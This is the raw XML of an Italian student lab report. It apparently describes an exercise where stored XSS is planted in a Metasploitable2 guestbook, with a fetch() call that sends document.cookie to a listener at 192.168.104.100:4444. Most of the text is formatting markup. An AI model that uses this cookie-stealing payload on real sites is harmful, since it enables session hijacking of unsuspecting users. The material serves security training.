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D960F" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Consegna traccia 2 LOW BW2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2780C" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Abbiamo provveduto a impostare l’indirizzo IP della macchina “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” per stare nella stessa rete di “Metasploitable2”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854197B" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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5211B3F3" wp14:editId="0C3149FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>619125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3324225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488440" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="16510" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="2021074425" name="Rettangolo 2021074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440" cy="18097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B9D020C" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
                            <w:pPr>
                              <w:spacing w:line="277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11B3F3" id="Rettangolo 2021074425" o:spid="_x0000_s1026" style="position:absolute;margin-left:48.75pt;margin-top:261.75pt;width:117.2pt;height:14.25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" filled="f" strokecolor="red" strokeweight="1.5pt">
                <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short"/>
                <v:textbox inset="2.53958mm,1.2694mm,2.53958mm,1.2694mm">
                  <w:txbxContent>
                    <w:p w14:paraId="5B9D020C" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
                      <w:pPr>
                        <w:spacing w:line="277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9F07182" wp14:editId="783F7911">
            <wp:extent cx="6053560" cy="4119880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2021074438" name="image2.png" descr="Immagine che contiene testo, schermata, software, Software multimediale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Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:srcRect l="189" r="898"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6053560" cy="4119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627B91" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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36147025" wp14:editId="491F15BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>518160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2146935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1170659" cy="163123"/>
                <wp:effectExtent l="0" t="0" r="10795" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="2021074429" name="Rettangolo 2021074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659" cy="163123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74C0256" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
                            <w:pPr>
                              <w:spacing w:line="277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147025" id="Rettangolo 2021074429" o:spid="_x0000_s1027" style="position:absolute;margin-left:40.8pt;margin-top:169.05pt;width:92.2pt;height:12.85pt;z-index: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" filled="f" strokecolor="red" strokeweight="1.5pt">
                <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short"/>
                <v:textbox inset="2.53958mm,1.2694mm,2.53958mm,1.2694mm">
                  <w:txbxContent>
                    <w:p w14:paraId="774C0256" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
                      <w:pPr>
                        <w:spacing w:line="277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8917C0D" wp14:editId="1050E5C1">
            <wp:extent cx="6120130" cy="2684780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2021074442" name="image3.png" descr="Immagine che contiene testo, schermata, Carattere, software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Immagine che contiene testo, schermata, Carattere, software&#10;&#10;Descrizione generata automaticament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84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2B5B7E" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="0861C752" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="2A284066" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="653B57F4" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="30AA0FBF" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Procediamo ora con l’apertura del server web sulla porta 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072ADFA4" w14:textId="7C28738B" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54191A19" wp14:editId="36E5879E">
            <wp:extent cx="6120130" cy="572770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="202107444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27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D25479" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="29FF5AC8" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:t xml:space="preserve">Poiché il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ha un limite di 50 caratteri modifichiamo il nome del file creato “script.js” in “x” per poterlo eseguire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A86AB" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"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5F6C31D9" wp14:editId="54C1497E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1749353</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2600688" cy="1476581"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="114300" distR="114300"/>
            <wp:docPr id="2021074432" name="image18.png" descr="Immagine che contiene testo, schermata, Carattere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 descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticament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4765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A1D2A0E" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="4BE3566B" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="6B77201C" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="5417B8D3" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="2D1A4ACC" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="64B44D46" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:t>Cosa fa il codice?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405561C" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="000713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fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> è una funzione nativa di JavaScript utilizzata per effettuare richieste HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC56EA8" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="000713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 questo caso, viene usata per inviare una richiesta HTTP GET verso un server esterno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3032C786" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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'http://192.168.104.100:4444/?c='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D24C4" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="000713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Questo è l'endpoint del server al quale viene inviata la richiesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241838D0" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>192.168.104.100</w:t>
      </w:r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indirizzo IP del server che riceverà i dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50485396" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r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porta su cui il server è in ascolto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB7B09" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="000713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Il </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">parametro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?c</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene utilizzato per appendere i dati che saranno inviati (in questo caso i cookie).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BBE12" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="000713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b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> è un metodo JavaScript che permette di ottenere i cookie della sessione corrente del browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10677C0E" w14:textId="1E909670" w:rsidR="0007133C" w:rsidRPr="0007133C" w:rsidRDefault="0007133C" w:rsidP="000713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lo faccio eseguire alla macchina mantenendomi entro i 50 caratteri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE7F897" w14:textId="7D3891A4" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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E384A25" w14:textId="50815A29" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133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D6CC651" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0EE273" w14:textId="07197810" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C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62D43B0" wp14:editId="5682E053">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>535305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="1870710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2021074443" name="image7.png" descr="Immagine che contiene testo, software, Carattere, Software multimediale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Immagine che contiene testo, software, Carattere, Software multimediale&#10;&#10;Descrizione generata automaticamente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707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t xml:space="preserve">Ora procediamo ad immettere il payload e fissarlo nella pagina confermano con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Guestbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36213CFF" w14:textId="75E4A139" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="5F09F613" w14:textId="4782B658" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:t>Come si vede dall’immagine seguente, dopo i test effettuati in precedenza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F124CE9" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177A26AA" wp14:editId="3E483090">
            <wp:extent cx="6120130" cy="2547620"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="2021074446" name="image13.png" descr="Immagine che contiene testo, schermata, software, Pagina Web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Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect t="41104"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2547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1D7FA8" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="02B71100" w14:textId="34061D06" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:t xml:space="preserve">Dal server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006701A6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> messo in ascolto</w:t>
      </w:r>
      <w:r w:rsidR="006701A6">
        <w:t xml:space="preserve"> sulla porta 4444 in precedenza,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ri</w:t>
      </w:r>
      <w:r>
        <w:t>usciamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a visualizzare i cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413CC9F" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A27B801" wp14:editId="00CAC985">
            <wp:extent cx="6120130" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2021074445" name="image8.png" descr="Immagine che contiene testo, schermata, Carattere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Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="22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95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9DBC44" w14:textId="59C3666E" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="383D763C" w14:textId="77777777" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C"/>
    <w:p w14:paraId="07F1608D" w14:textId="28EDA155" w:rsidR="0007133C" w:rsidRDefault="0007133C" w:rsidP="0007133C">
      <w:r>
        <w:t>Livello low completato</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000713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34D3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE80C5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33C"/>
    <w:rsid w:val="0007133C"/>
    <w:rsid w:val="006701A6"/>
    <w:rsid w:val="00EF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20BAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{678C74A2-1FAF-4FA8-AE48-84BBB1806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7133C"/>
    <w:pPr>
      <w:spacing w:line="278" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos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Pilu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Fabio Pilu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-10T10:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-10T10:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>